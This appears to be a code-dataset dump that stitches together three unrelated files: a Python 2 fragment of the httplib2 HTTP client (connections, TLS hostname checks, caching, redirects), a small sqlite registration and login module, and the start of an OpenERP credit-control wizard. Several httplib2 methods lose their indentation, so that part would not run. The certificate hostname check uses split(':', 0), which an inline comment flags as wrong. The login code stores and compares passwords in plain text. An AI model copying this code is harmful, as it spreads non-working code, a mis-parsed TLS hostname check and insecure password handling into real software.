        for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res
            try:
                if use_proxy:
                    self.sock = socks.socksocket(af, socktype, proto)
                    self.sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
                else:
                    self.sock = socket.socket(af, socktype, proto)
                    self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
                # Different from httplib: support timeouts.
                if has_timeout(self.timeout):
                    self.sock.settimeout(self.timeout)
                # End of difference from httplib.
                if self.debuglevel > 0:
                    print "connect: (%s, %s) ************" % (self.host, self.port)
                    if use_proxy:
                        print "proxy: %s ************" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))

                self.sock.connect((self.host, self.port) + sa[2:])
            except socket.error, msg:
                if self.debuglevel > 0:
                    print "connect fail: (%s, %s)" % (self.host, self.port)
                    if use_proxy:
                        print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
                if self.sock:
                    self.sock.close()
                self.sock = None
                # Move on to the next getaddrinfo result.
                continue
            break
        if not self.sock:
            # Every candidate address failed; re-raise the last error.
            raise socket.error, msg
class HTTPSConnectionWithTimeout(httplib.HTTPSConnection):
    """
    This class allows communication via SSL.

    All timeouts are in seconds. If None is passed for timeout then
    Python's default timeout for sockets will be used. See for example
    the docs of socket.setdefaulttimeout():
    http://docs.python.org/library/socket.html#socket.setdefaulttimeout
    """
    def __init__(self, host, port=None, key_file=None, cert_file=None,
                 strict=None, timeout=None, proxy_info=None,
                 ca_certs=None, disable_ssl_certificate_validation=False):
        httplib.HTTPSConnection.__init__(self, host, port=port,
                                         key_file=key_file,
                                         cert_file=cert_file, strict=strict)
        self.timeout = timeout
        self.proxy_info = proxy_info
        if ca_certs is None:
            # Fall back to the CA bundle shipped with httplib2.
            ca_certs = CA_CERTS
        self.ca_certs = ca_certs
        self.disable_ssl_certificate_validation = \
                disable_ssl_certificate_validation

    # The following two methods were adapted from https_wrapper.py, released
    # with the Google Appengine SDK at
    # http://googleappengine.googlecode.com/svn-history/r136/trunk/python/google/appengine/tools/https_wrapper.py
    # under the following license:
    #
    # Copyright 2007 Google Inc.
    #
    # Licensed under the Apache License, Version 2.0 (the "License");
    # you may not use this file except in compliance with the License.
    # You may obtain a copy of the License at
    #
    #     http://www.apache.org/licenses/LICENSE-2.0
    #
    # Unless required by applicable law or agreed to in writing, software
    # distributed under the License is distributed on an "AS IS" BASIS,
    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    # See the License for the specific language governing permissions and
    # limitations under the License.
    #

    def _GetValidHostsForCert(self, cert):
        """Returns a list of valid host globs for an SSL certificate.

        Args:
          cert: A dictionary representing an SSL certificate.
        Returns:
          list: A list of valid host globs.
        """
        # subjectAltName DNS entries take precedence over the subject CN.
        if 'subjectAltName' in cert:
            return [x[1] for x in cert['subjectAltName']
                    if x[0].lower() == 'dns']
        else:
            return [x[0][1] for x in cert['subject']
                    if x[0][0].lower() == 'commonname']

    def _ValidateCertificateHostname(self, cert, hostname):
        """Validates that a given hostname is valid for an SSL certificate.

        Args:
          cert: A dictionary representing an SSL certificate.
          hostname: The hostname to test.
        Returns:
          bool: Whether or not the hostname is valid for this certificate.
        """
        hosts = self._GetValidHostsForCert(cert)
        for host in hosts:
            # Turn the cert glob into an anchored, case-insensitive regex;
            # '*' matches a single label (no dots).
            host_re = host.replace('.', '\.').replace('*', '[^.]*')
            if re.search('^%s$' % (host_re,), hostname, re.I):
                return True
        return False

    def connect(self):
        "Connect to a host on a given (SSL) port."

        msg = "getaddrinfo returns an empty list"
        if self.proxy_info and self.proxy_info.isgood():
            use_proxy = True
            proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
            # Resolve/connect to the proxy, not the origin server.
            host = proxy_host
            port = proxy_port
        else:
            use_proxy = False
            host = self.host
            port = self.port

        address_info = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
        for family, socktype, proto, canonname, sockaddr in address_info:
            try:
                if use_proxy:
                    sock = socks.socksocket(family, socktype, proto)
                    sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
                else:
                    sock = socket.socket(family, socktype, proto)
                    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
                if has_timeout(self.timeout):
                    sock.settimeout(self.timeout)
                sock.connect((self.host, self.port))
                # Wrap the plain socket in SSL before any data is exchanged.
                self.sock =_ssl_wrap_socket(
                    sock, self.key_file, self.cert_file,
                    self.disable_ssl_certificate_validation, self.ca_certs)
                if self.debuglevel > 0:
                    print "connect: (%s, %s)" % (self.host, self.port)
                    if use_proxy:
                        print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
                if not self.disable_ssl_certificate_validation:
                    cert = self.sock.getpeercert()
                    # NOTE(review): maxsplit=0 means no split is performed,
                    # so the full self.host string is used as the hostname.
                    # Looks like it should be split(':', 1)[0] — confirm.
                    hostname = self.host.split(':', 0)[0]
                    if not self._ValidateCertificateHostname(cert, hostname):
                        raise CertificateHostnameMismatch(
                            'Server presented certificate that does not match '
                            'host %s: %s' % (hostname, cert), hostname, cert)
            except ssl_SSLError, e:
                if sock:
                    sock.close()
                if self.sock:
                    self.sock.close()
                self.sock = None
                # Unfortunately the ssl module doesn't seem to provide any way
                # to get at more detailed error information, in particular
                # whether the error is due to certificate validation or
                # something else (such as SSL protocol mismatch).
                if e.errno == ssl.SSL_ERROR_SSL:
                    raise SSLHandshakeError(e)
                else:
                    raise
            except (socket.timeout, socket.gaierror):
                # Timeouts and DNS failures are terminal; don't try other
                # addresses.
                raise
            except socket.error, msg:
                if self.debuglevel > 0:
                    print "connect fail: (%s, %s)" % (self.host, self.port)
                    if use_proxy:
                        print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
                if self.sock:
                    self.sock.close()
                self.sock = None
                # Move on to the next getaddrinfo result.
                continue
            break
        if not self.sock:
            # Every candidate address failed; re-raise the last error.
            raise socket.error, msg
# Map a URI scheme to the connection class used to fetch it (replaced with
# App Engine specific classes when running on Google App Engine).
SCHEME_TO_CONNECTION = {
    'http': HTTPConnectionWithTimeout,
    'https': HTTPSConnectionWithTimeout
}
# Use a different connection object for Google App Engine
try:
    try:
        from google.appengine.api import apiproxy_stub_map
        if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
            raise ImportError  # Bail out; we're not actually running on App Engine.
        from google.appengine.api.urlfetch import fetch
        from google.appengine.api.urlfetch import InvalidURLError
    except (ImportError, AttributeError):
        # Internal Google deployments use the google3 package layout.
        from google3.apphosting.api import apiproxy_stub_map
        if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
            raise ImportError  # Bail out; we're not actually running on App Engine.
        from google3.apphosting.api.urlfetch import fetch
        from google3.apphosting.api.urlfetch import InvalidURLError

    def _new_fixed_fetch(validate_certificate):
        """Return a fetch() wrapper with *validate_certificate* pinned and a
        default deadline taken from the global socket timeout (or 5s)."""
        def fixed_fetch(url, payload=None, method="GET", headers={},
                        allow_truncated=False, follow_redirects=True,
                        deadline=None):
            if deadline is None:
                deadline = socket.getdefaulttimeout() or 5
            return fetch(url, payload=payload, method=method, headers=headers,
                         allow_truncated=allow_truncated,
                         follow_redirects=follow_redirects, deadline=deadline,
                         validate_certificate=validate_certificate)
        return fixed_fetch

    class AppEngineHttpConnection(httplib.HTTPConnection):
        """Use httplib on App Engine, but compensate for its weirdness.

        The parameters key_file, cert_file, proxy_info, ca_certs, and
        disable_ssl_certificate_validation are all dropped on the ground.
        """
        def __init__(self, host, port=None, key_file=None, cert_file=None,
                     strict=None, timeout=None, proxy_info=None, ca_certs=None,
                     disable_ssl_certificate_validation=False):
            httplib.HTTPConnection.__init__(self, host, port=port,
                                            strict=strict, timeout=timeout)

    class AppEngineHttpsConnection(httplib.HTTPSConnection):
        """Same as AppEngineHttpConnection, but for HTTPS URIs."""
        def __init__(self, host, port=None, key_file=None, cert_file=None,
                     strict=None, timeout=None, proxy_info=None, ca_certs=None,
                     disable_ssl_certificate_validation=False):
            httplib.HTTPSConnection.__init__(self, host, port=port,
                                             key_file=key_file,
                                             cert_file=cert_file, strict=strict,
                                             timeout=timeout)
            self._fetch = _new_fixed_fetch(
                    not disable_ssl_certificate_validation)

    # Update the connection classes to use the Google App Engine specific ones.
    SCHEME_TO_CONNECTION = {
        'http': AppEngineHttpConnection,
        'https': AppEngineHttpsConnection
    }
except (ImportError, AttributeError):
    pass
class Http(object):
"""An HTTP client that handles:
- all methods
- caching
- ETags
- compression,
- HTTPS
- Basic
- Digest
- WSSE
and more.
"""
    def __init__(self, cache=None, timeout=None,
                 proxy_info=proxy_info_from_environment,
                 ca_certs=None, disable_ssl_certificate_validation=False):
        """If 'cache' is a string then it is used as a directory name for
        a disk cache. Otherwise it must be an object that supports the
        same interface as FileCache.

        All timeouts are in seconds. If None is passed for timeout
        then Python's default timeout for sockets will be used. See
        for example the docs of socket.setdefaulttimeout():
        http://docs.python.org/library/socket.html#socket.setdefaulttimeout

        `proxy_info` may be:
          - a callable that takes the http scheme ('http' or 'https') and
            returns a ProxyInfo instance per request. By default, uses
            proxy_info_from_environment.
          - a ProxyInfo instance (static proxy config).
          - None (proxy disabled).

        ca_certs is the path of a file containing root CA certificates for SSL
        server certificate validation.  By default, a CA cert file bundled with
        httplib2 is used.

        If disable_ssl_certificate_validation is true, SSL cert validation will
        not be performed.
        """
        self.proxy_info = proxy_info
        self.ca_certs = ca_certs
        self.disable_ssl_certificate_validation = \
                disable_ssl_certificate_validation

        # Map domain name to an httplib connection
        self.connections = {}
        # The location of the cache, for now a directory
        # where cached responses are held.
        if cache and isinstance(cache, basestring):
            self.cache = FileCache(cache)
        else:
            self.cache = cache

        # Name/password
        self.credentials = Credentials()

        # Key/cert
        self.certificates = KeyCerts()

        # authorization objects
        self.authorizations = []

        # If set to False then no redirects are followed, even safe ones.
        self.follow_redirects = True

        # Which HTTP methods do we apply optimistic concurrency to, i.e.
        # which methods get an "if-match:" etag header added to them.
        self.optimistic_concurrency_methods = ["PUT", "PATCH"]

        # If 'follow_redirects' is True, and this is set to True then
        # all redirects are followed, including unsafe ones.
        self.follow_all_redirects = False

        self.ignore_etag = False

        self.force_exception_to_status_code = False

        self.timeout = timeout

        # Keep Authorization: headers on a redirect.
        self.forward_authorization_headers = False
def __getstate__(self):
state_dict = copy.copy(self.__dict__)
# In case request is augmented by some foreign object such as
# credentials which handle auth
if 'request' in state_dict:
del state_dict['request']
if 'connections' in state_dict:
del state_dict['connections']
return state_dict
    def __setstate__(self, state):
        """Unpickle support: restore attributes and start with a fresh
        (empty) connection pool, since __getstate__ dropped it."""
        self.__dict__.update(state)
        self.connections = {}
def _auth_from_challenge(self, host, request_uri, headers, response, content):
"""A generator that creates Authorization objects
that can be applied to requests.
"""
challenges = _parse_www_authenticate(response, 'www-authenticate')
for cred in self.credentials.iter(host):
for scheme in AUTH_SCHEME_ORDER:
if challenges.has_key(scheme):
yield AUTH_SCHEME_CLASSES[scheme](cred, host, request_uri, headers, response, content, self)
def add_credentials(self, name, password, domain=""):
    """Register a name/password pair for HTTP authentication.

    The pair is offered any time a request requires authentication;
    an empty `domain` (the default) makes it apply everywhere.
    """
    self.credentials.add(name, password, domain)
def add_certificate(self, key, cert, domain):
    """Register a client key/certificate pair for `domain`.

    The pair is offered any time a request to that domain requires
    SSL client authentication.
    """
    self.certificates.add(key, cert, domain)
def clear_credentials(self):
    """Forget every stored name/password pair.

    Any authorization objects previously derived from those
    credentials are discarded as well.
    """
    self.credentials.clear()
    self.authorizations = []
def _conn_request(self, conn, request_uri, method, body, headers):
    # Issue a single HTTP request over `conn`, retrying up to RETRIES
    # times around transient connection failures.
    # Returns a (Response, content) tuple.
    i = 0
    seen_bad_status_line = False
    while i < RETRIES:
        i += 1
        try:
            # Reconnect lazily if the socket was closed (e.g. by an
            # earlier failed attempt in this loop).
            if hasattr(conn, 'sock') and conn.sock is None:
                conn.connect()
            conn.request(method, request_uri, body, headers)
        except socket.timeout:
            # Timeouts are never retried here; let the caller decide.
            raise
        except socket.gaierror:
            # DNS resolution failed: rebrand as a httplib2 error.
            conn.close()
            raise ServerNotFoundError("Unable to find the server at %s" % conn.host)
        except ssl_SSLError:
            conn.close()
            raise
        except socket.error, e:
            # Extract the errno; older exception objects carry it in
            # args[0], newer ones expose .errno.
            err = 0
            if hasattr(e, 'args'):
                err = getattr(e, 'args')[0]
            else:
                err = e.errno
            if err in (errno.ENETUNREACH, errno.EADDRNOTAVAIL) and i < RETRIES:
                continue  # retry on potentially transient socket errors
            raise
        except httplib.HTTPException:
            # Just because the server closed the connection doesn't apparently mean
            # that the server didn't send a response.
            if hasattr(conn, 'sock') and conn.sock is None:
                if i < RETRIES-1:
                    conn.close()
                    conn.connect()
                    continue
                else:
                    conn.close()
                    raise
            if i < RETRIES-1:
                conn.close()
                conn.connect()
                continue
        try:
            response = conn.getresponse()
        except httplib.BadStatusLine:
            # If we get a BadStatusLine on the first try then that means
            # the connection just went stale, so retry regardless of the
            # number of RETRIES set.
            if not seen_bad_status_line and i == 1:
                i = 0
                seen_bad_status_line = True
                conn.close()
                conn.connect()
                continue
            else:
                conn.close()
                raise
        except (socket.error, httplib.HTTPException):
            if i < RETRIES-1:
                conn.close()
                conn.connect()
                continue
            else:
                conn.close()
                raise
        else:
            content = ""
            if method == "HEAD":
                # HEAD responses carry no body; close so the connection
                # is not left half-read.
                conn.close()
            else:
                content = response.read()
            response = Response(response)
            if method != "HEAD":
                # NOTE(review): presumably undoes gzip/deflate
                # content-encoding -- see module-level _decompressContent.
                content = _decompressContent(response, content)
        break
    return (response, content)
def _request(self, conn, host, absolute_uri, request_uri, method, body, headers, redirections, cachekey):
    """Do the actual request using the connection object
    and also follow one level of redirects if necessary.

    Applies any in-scope authorization before sending, answers 401
    challenges, follows 3xx redirects (recursing through self.request
    with a decremented `redirections` budget), and updates the cache
    for cacheable 200/203 responses.
    """
    # Pick the most specific (deepest-path) authorization in scope.
    auths = [(auth.depth(request_uri), auth) for auth in self.authorizations if auth.inscope(host, request_uri)]
    auth = auths and sorted(auths)[0][1] or None
    if auth:
        auth.request(method, request_uri, headers, body)

    (response, content) = self._conn_request(conn, request_uri, method, body, headers)

    if auth:
        # Give the auth object a chance to react (e.g. a stale digest
        # nonce); if it asks, re-send the request once.
        if auth.response(response, body):
            auth.request(method, request_uri, headers, body)
            (response, content) = self._conn_request(conn, request_uri, method, body, headers )
            response._stale_digest = 1

    if response.status == 401:
        # Try each credential/scheme combination until one is accepted.
        for authorization in self._auth_from_challenge(host, request_uri, headers, response, content):
            authorization.request(method, request_uri, headers, body)
            (response, content) = self._conn_request(conn, request_uri, method, body, headers, )
            if response.status != 401:
                self.authorizations.append(authorization)
                authorization.response(response, body)
                break

    if (self.follow_all_redirects or (method in ["GET", "HEAD"]) or response.status == 303):
        if self.follow_redirects and response.status in [300, 301, 302, 303, 307]:
            # Pick out the location header and basically start from the beginning
            # remembering first to strip the ETag header and decrement our 'depth'
            if redirections:
                if not response.has_key('location') and response.status != 300:
                    raise RedirectMissingLocation( _("Redirected but the response is missing a Location: header."), response, content)
                # Fix-up relative redirects (which violate an RFC 2616 MUST)
                if response.has_key('location'):
                    location = response['location']
                    (scheme, authority, path, query, fragment) = parse_uri(location)
                    if authority == None:
                        response['location'] = urlparse.urljoin(absolute_uri, location)
                if response.status == 301 and method in ["GET", "HEAD"]:
                    # Permanent redirect: remember the target in the cache
                    # so future requests can skip the round trip.
                    response['-x-permanent-redirect-url'] = response['location']
                    if not response.has_key('content-location'):
                        response['content-location'] = absolute_uri
                    _updateCache(headers, response, content, self.cache, cachekey)
                # Strip validators and (usually) credentials before
                # following the redirect.
                if headers.has_key('if-none-match'):
                    del headers['if-none-match']
                if headers.has_key('if-modified-since'):
                    del headers['if-modified-since']
                if 'authorization' in headers and not self.forward_authorization_headers:
                    del headers['authorization']
                if response.has_key('location'):
                    location = response['location']
                    old_response = copy.deepcopy(response)
                    if not old_response.has_key('content-location'):
                        old_response['content-location'] = absolute_uri
                    redirect_method = method
                    if response.status in [302, 303]:
                        # 302/303 are followed with GET and no body.
                        redirect_method = "GET"
                        body = None
                    (response, content) = self.request(
                        location, method=redirect_method,
                        body=body, headers=headers,
                        redirections=redirections - 1)
                    response.previous = old_response
            else:
                raise RedirectLimit("Redirected more times than rediection_limit allows.", response, content)
    elif response.status in [200, 203] and method in ["GET", "HEAD"]:
        # Don't cache 206's since we aren't going to handle byte range requests
        if not response.has_key('content-location'):
            response['content-location'] = absolute_uri
        _updateCache(headers, response, content, self.cache, cachekey)

    return (response, content)
def _normalize_headers(self, headers):
    # Delegate to the module-level helper of the same name.
    return _normalize_headers(headers)
# Need to catch and rebrand some exceptions
# Then need to optionally turn all exceptions into status codes
# including all socket.* and httplib.* exceptions.
def request(self, uri, method="GET", body=None, headers=None, redirections=DEFAULT_MAX_REDIRECTS, connection_type=None):
    """Performs a single HTTP request.

    The 'uri' is the URI of the HTTP resource and can begin with either
    'http' or 'https'. The value of 'uri' must be an absolute URI.

    The 'method' is the HTTP method to perform, such as GET, POST, DELETE,
    etc. There is no restriction on the methods allowed.

    The 'body' is the entity body to be sent with the request. It is a
    string object.

    Any extra headers that are to be sent with the request should be
    provided in the 'headers' dictionary.

    The maximum number of redirects to follow before raising an
    exception is 'redirections'. The default is 5.

    The return value is a tuple of (response, content), the first
    being an instance of the 'Response' class, the second being
    a string that contains the response entity body.
    """
    try:
        if headers is None:
            headers = {}
        else:
            headers = self._normalize_headers(headers)

        if not headers.has_key('user-agent'):
            headers['user-agent'] = "Python-httplib2/%s (gzip)" % __version__

        uri = iri2uri(uri)

        (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)
        # http://host:443 is really https; normalize before pooling.
        domain_port = authority.split(":")[0:2]
        if len(domain_port) == 2 and domain_port[1] == '443' and scheme == 'http':
            scheme = 'https'
            authority = domain_port[0]

        proxy_info = self._get_proxy_info(scheme, authority)

        # One pooled connection per scheme+authority.
        conn_key = scheme+":"+authority
        if conn_key in self.connections:
            conn = self.connections[conn_key]
        else:
            if not connection_type:
                connection_type = SCHEME_TO_CONNECTION[scheme]
            certs = list(self.certificates.iter(authority))
            if scheme == 'https':
                if certs:
                    conn = self.connections[conn_key] = connection_type(
                            authority, key_file=certs[0][0],
                            cert_file=certs[0][1], timeout=self.timeout,
                            proxy_info=proxy_info,
                            ca_certs=self.ca_certs,
                            disable_ssl_certificate_validation=
                                    self.disable_ssl_certificate_validation)
                else:
                    conn = self.connections[conn_key] = connection_type(
                            authority, timeout=self.timeout,
                            proxy_info=proxy_info,
                            ca_certs=self.ca_certs,
                            disable_ssl_certificate_validation=
                                    self.disable_ssl_certificate_validation)
            else:
                conn = self.connections[conn_key] = connection_type(
                        authority, timeout=self.timeout,
                        proxy_info=proxy_info)
            conn.set_debuglevel(debuglevel)

        # Only advertise compression when the caller is not doing a
        # byte-range request and has not set its own accept-encoding.
        if 'range' not in headers and 'accept-encoding' not in headers:
            headers['accept-encoding'] = 'gzip, deflate'

        info = email.Message.Message()
        cached_value = None
        if self.cache:
            cachekey = defrag_uri.encode('utf-8')
            cached_value = self.cache.get(cachekey)
            if cached_value:
                # info = email.message_from_string(cached_value)
                #
                # Need to replace the line above with the kludge below
                # to fix the non-existent bug not fixed in this
                # bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html
                try:
                    info, content = cached_value.split('\r\n\r\n', 1)
                    feedparser = email.FeedParser.FeedParser()
                    feedparser.feed(info)
                    info = feedparser.close()
                    feedparser._parse = None
                except (IndexError, ValueError):
                    # Corrupt cache entry: discard it and carry on.
                    self.cache.delete(cachekey)
                    cachekey = None
                    cached_value = None
        else:
            cachekey = None

        if method in self.optimistic_concurrency_methods and self.cache and info.has_key('etag') and not self.ignore_etag and 'if-match' not in headers:
            # http://www.w3.org/1999/04/Editing/
            headers['if-match'] = info['etag']

        if method not in ["GET", "HEAD"] and self.cache and cachekey:
            # RFC 2616 Section 13.10
            self.cache.delete(cachekey)

        # Check the vary header in the cache to see if this request
        # matches what varies in the cache.
        if method in ['GET', 'HEAD'] and 'vary' in info:
            vary = info['vary']
            vary_headers = vary.lower().replace(' ', '').split(',')
            for header in vary_headers:
                key = '-varied-%s' % header
                value = info[key]
                if headers.get(header, None) != value:
                    # Varied header differs: the cached entry is unusable.
                    cached_value = None
                    break

        if cached_value and method in ["GET", "HEAD"] and self.cache and 'range' not in headers:
            if info.has_key('-x-permanent-redirect-url'):
                # Should cached permanent redirects be counted in our redirection count? For now, yes.
                if redirections <= 0:
                    raise RedirectLimit("Redirected more times than rediection_limit allows.", {}, "")
                (response, new_content) = self.request(
                    info['-x-permanent-redirect-url'], method='GET',
                    headers=headers, redirections=redirections - 1)
                response.previous = Response(info)
                response.previous.fromcache = True
            else:
                # Determine our course of action:
                #   Is the cached entry fresh or stale?
                #   Has the client requested a non-cached response?
                #
                # There seems to be three possible answers:
                # 1. [FRESH] Return the cache entry w/o doing a GET
                # 2. [STALE] Do the GET (but add in cache validators if available)
                # 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request
                entry_disposition = _entry_disposition(info, headers)

                if entry_disposition == "FRESH":
                    if not cached_value:
                        info['status'] = '504'
                        content = ""
                    response = Response(info)
                    if cached_value:
                        response.fromcache = True
                    return (response, content)

                if entry_disposition == "STALE":
                    # Add validators so the origin can answer 304.
                    if info.has_key('etag') and not self.ignore_etag and not 'if-none-match' in headers:
                        headers['if-none-match'] = info['etag']
                    if info.has_key('last-modified') and not 'last-modified' in headers:
                        headers['if-modified-since'] = info['last-modified']
                elif entry_disposition == "TRANSPARENT":
                    pass

                (response, new_content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)

            if response.status == 304 and method == "GET":
                # Rewrite the cache entry with the new end-to-end headers
                # Take all headers that are in response
                # and overwrite their values in info.
                # unless they are hop-by-hop, or are listed in the connection header.
                for key in _get_end2end_headers(response):
                    info[key] = response[key]
                merged_response = Response(info)
                if hasattr(response, "_stale_digest"):
                    merged_response._stale_digest = response._stale_digest
                _updateCache(headers, merged_response, content, self.cache, cachekey)
                response = merged_response
                response.status = 200
                response.fromcache = True
            elif response.status == 200:
                content = new_content
            else:
                self.cache.delete(cachekey)
                content = new_content
        else:
            cc = _parse_cache_control(headers)
            if cc.has_key('only-if-cached'):
                # RFC 2616 14.9.4: no usable cache entry and the client
                # forbade a network fetch -> 504.
                info['status'] = '504'
                response = Response(info)
                content = ""
            else:
                (response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
    except Exception, e:
        # Optionally convert any failure into a synthetic error response
        # instead of propagating the exception.
        if self.force_exception_to_status_code:
            if isinstance(e, HttpLib2ErrorWithResponse):
                response = e.response
                content = e.content
                response.status = 500
                response.reason = str(e)
            elif isinstance(e, socket.timeout):
                content = "Request Timeout"
                response = Response({
                    "content-type": "text/plain",
                    "status": "408",
                    "content-length": len(content)
                })
                response.reason = "Request Timeout"
            else:
                content = str(e)
                response = Response({
                    "content-type": "text/plain",
                    "status": "400",
                    "content-length": len(content)
                })
                response.reason = "Bad Request"
        else:
            raise

    return (response, content)
def _get_proxy_info(self, scheme, authority):
    """Resolve the proxy configuration for one request.

    Returns a ProxyInfo instance, or None when no proxy applies to
    `authority` under `scheme`.
    """
    hostname, _port = urllib.splitport(authority)
    candidate = self.proxy_info
    if callable(candidate):
        # A callable proxy_info selects a proxy per scheme.
        candidate = candidate(scheme)
    if hasattr(candidate, 'applies_to') and not candidate.applies_to(hostname):
        candidate = None
    return candidate
class Response(dict):
    """An object more like email.Message than httplib.HTTPResponse.

    Behaves as a dict mapping lower-cased header names to values, with
    extra attributes describing the response itself.
    """

    # Is this response from our local cache?
    fromcache = False
    # HTTP protocol version used by server: 10 for HTTP/1.0, 11 for HTTP/1.1.
    version = 11
    # Status code returned by server.
    status = 200
    # Reason phrase returned by server.
    reason = "Ok"
    # Previous Response in a redirect chain, if any.
    previous = None

    def __init__(self, info):
        # info is either an email.Message or
        # an httplib.HTTPResponse object.
        if isinstance(info, httplib.HTTPResponse):
            for key, value in info.getheaders():
                self[key.lower()] = value
            self.status = info.status
            self['status'] = str(self.status)
            self.reason = info.reason
            self.version = info.version
        elif isinstance(info, email.Message.Message):
            for key, value in info.items():
                self[key.lower()] = value
            self.status = int(self['status'])
        else:
            # Assume a plain mapping of header name -> value.
            # .items() instead of the Python2-only .iteritems():
            # identical iteration, and keeps this branch portable.
            for key, value in info.items():
                self[key.lower()] = value
            self.status = int(self.get('status', self.status))
            self.reason = self.get('reason', self.reason)

    def __getattr__(self, name):
        if name == 'dict':
            return self
        else:
            # Call form instead of the Python2-only `raise X, arg`
            # statement syntax (a SyntaxError on Python 3); behavior
            # is identical on Python 2.
            raise AttributeError(name)
| gpl-3.0 |
AdiPersonalWorks/ATOS_GOM_SystemPrototyping | pytodatabase.py | 1 | 1615 | from os import getenv
import pymssql
import pico
import time
import sqlite3
import datetime
def RegisDB(Username, Pass, email, dept):
    """Insert a new user registration into SMART_Registrations.

    New users are always created with the 'Expert' access level; the
    creation and last-login timestamps are both set to now.

    Returns 1 on success, 0 when the INSERT fails (e.g. missing table
    or constraint violation). Errors opening the database still
    propagate, as in the original.
    """
    conn = sqlite3.connect('Databases/SMART.db')
    cur_datetime = str(datetime.datetime.now())
    usrType = 'Expert'
    try:
        conn.execute(
            'INSERT INTO SMART_Registrations (Username, Password, Email, Department, UserAccessLevel, CreatedTime, LastLogin) VALUES (?,?,?,?,?,?,?)',
            (Username, Pass, email, dept, usrType, cur_datetime, cur_datetime))
        conn.commit()
        return 1
    except sqlite3.Error:
        # Narrowed from a bare `except:` that also swallowed
        # KeyboardInterrupt/SystemExit; the gratuitous time.sleep(5)
        # calls (10s per registration) were removed as debug cruft.
        return 0
    finally:
        # Always release the connection; the original leaked it on failure.
        conn.close()
# Login Validation
def Login_Validate(UID, Pass):
    """Validate UID/Pass against the SMART_Registrations table.

    Returns 1 when the first row whose Username equals UID also has a
    matching Password, 0 otherwise (unknown user or wrong password).

    NOTE(review): passwords are stored and compared in plain text --
    consider hashing before this ships.
    """
    conn = sqlite3.connect('Databases/SMART.db')
    try:
        cursor = conn.cursor()
        cursor.execute('SELECT Username,Password FROM SMART_Registrations')
        rows = cursor.fetchall()
    finally:
        # The original called conn.close() after `return`, i.e. never:
        # the connection was always leaked. Debug prints (Python2-only
        # `print` statements) were removed as well.
        conn.close()
    for username, password in rows:
        if str(username) == UID:
            return 1 if str(password) == Pass else 0
    return 0
##message = Login_Validate('adityaexpert','adityaexpert')
##print message
| mit |
vauxoo-dev/account-financial-tools | __unported__/account_credit_control/wizard/credit_control_policy_changer.py | 2 | 7541 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Nicolas Bessi
# Copyright 2014 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.tools.translate import _
from openerp.osv import orm, fields
logger = logging.getLogger(__name__)
class credit_control_policy_changer(orm.TransientModel):
    """Wizard that is run from invoices and allows to manually set a policy.

    The chosen policy is actually applied to the related move lines
    available in the selection widget.
    """

    _name = "credit.control.policy.changer"

    _columns = {
        'new_policy_id': fields.many2one('credit.control.policy',
                                         'New Policy to Apply',
                                         required=True),
        'new_policy_level_id': fields.many2one('credit.control.policy.level',
                                               'New level to apply',
                                               required=True),
        # Only used to provide dynamic filtering on form
        'do_nothing': fields.boolean('No follow policy'),
        'move_line_ids': fields.many2many('account.move.line',
                                          rel='credit_changer_ml_rel',
                                          string='Move line to change'),
    }

    def _get_default_lines(self, cr, uid, context=None):
        """Get default lines for field move_line_ids
        of the wizard. Only take lines that are on the same account
        and move as the invoice and not reconciled.

        :return: list of compliant move line ids
        """
        if context is None:
            context = {}
        active_ids = context.get('active_ids')
        selected_line_ids = []
        inv_model = self.pool['account.invoice']
        move_line_model = self.pool['account.move.line']
        if not active_ids:
            return False
            # raise ValueError('No active_ids passed in context')
        for invoice in inv_model.browse(cr, uid, active_ids, context=context):
            # The wizard only makes sense for customer invoices.
            if invoice.type in ('in_invoice', 'in_refund', 'out_refund'):
                raise orm.except_orm(
                    _('User error'),
                    _('Please use wizard on cutomer invoices')
                )
            domain = [('account_id', '=', invoice.account_id.id),
                      ('move_id', '=', invoice.move_id.id),
                      ('reconcile_id', '=', False)]
            move_ids = move_line_model.search(cr, uid, domain, context=context)
            selected_line_ids.extend(move_ids)
        return selected_line_ids

    _defaults = {'move_line_ids': _get_default_lines}

    def onchange_policy_id(self, cr, uid, ids, new_policy_id, context=None):
        # on_change handler: mirror the selected policy's do_nothing flag
        # onto the wizard so the form can filter dynamically.
        if not new_policy_id:
            return {}
        policy = self.pool['credit.control.policy'].browse(cr, uid,
                                                           new_policy_id,
                                                           context=context)
        return {'value': {'do_nothing': policy.do_nothing}}

    def _mark_as_overridden(self, cr, uid, move_lines, context=None):
        """Mark `move_lines` related credit control lines as overridden.

        This is done by setting the manually_overridden field to True.

        :param move_lines: move lines to mark as overridden
        :return: list of credit line ids that were marked as overridden
        """
        credit_model = self.pool['credit.control.line']
